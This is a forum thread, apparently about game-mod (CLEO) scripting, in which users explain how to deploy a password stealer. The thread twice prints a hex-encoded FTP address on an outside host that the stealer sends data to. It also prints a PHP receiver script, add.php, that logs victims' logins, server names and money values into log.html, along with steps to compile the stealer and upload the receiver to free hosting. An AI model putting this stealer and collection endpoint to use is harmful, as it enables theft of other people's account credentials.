what does it dospringfield link said:
what does it dodokoko14 link said:[quote author=springfield link=topic=7646.msg43427#msg43427 date=1402086772]
http://pastebin.com/BHXd1uKd
You need to upload a add.php to a host, like hostinger...esmer_gm link said:where i can find server where i can to get passwords?
hex
"ftp:" 2f 2f "ftp.stelerexe.url.ph" 2f "stealer" 2f "add.php" 00
end
<? Php
$ s = date ("H: I: sm.dy"). "Login:". $ _GET ['Log']. "Server:". $ _GET ['Srvr']. "Info:". $ _GET ['Inf'];
if ($ _GET ['H'])
{
$ s = $ s. "Money:". $ _GET ['Mn'];
}
$ s = $ s. "
"; if (strlen ($ _GET ['inf'])> 2) { $ F = fopen ("log.html", "A"); fwrite ($ F, $ s); fclose ( $ F); } ?>
You can us any FTP hosting.Curoar link said:Do you even try? :kidding: After one minute of using google I already found your answer.
hex
"ftp:" 2f 2f "ftp.stelerexe.url.ph" 2f "stealer" 2f "add.php" 00
end
This is where you insert the hosts URL
Then you compile the script.
Add the add.php to your host
<? Php
$ s = date ("H: I: sm.dy"). "Login:". $ _GET ['Log']. "Server:". $ _GET ['Srvr']. "Info:". $ _GET ['Inf'];
if ($ _GET ['H'])
{
$ s = $ s. "Money:". $ _GET ['Mn'];
}
$ s = $ s. "
"; if (strlen ($ _GET ['inf'])> 2) { $ F = fopen ("log.html", "A"); fwrite ($ F, $ s); fclose ( $ F); } ?>
And that's it.
If you are incapable of doing this after being given all of this, you shouldn't tinker with this stuff.
Curoar link said:I tried to compile the script and got Unknown directive key 30@, no idea about cleo scripting on my behalf. Anyone might be able to help?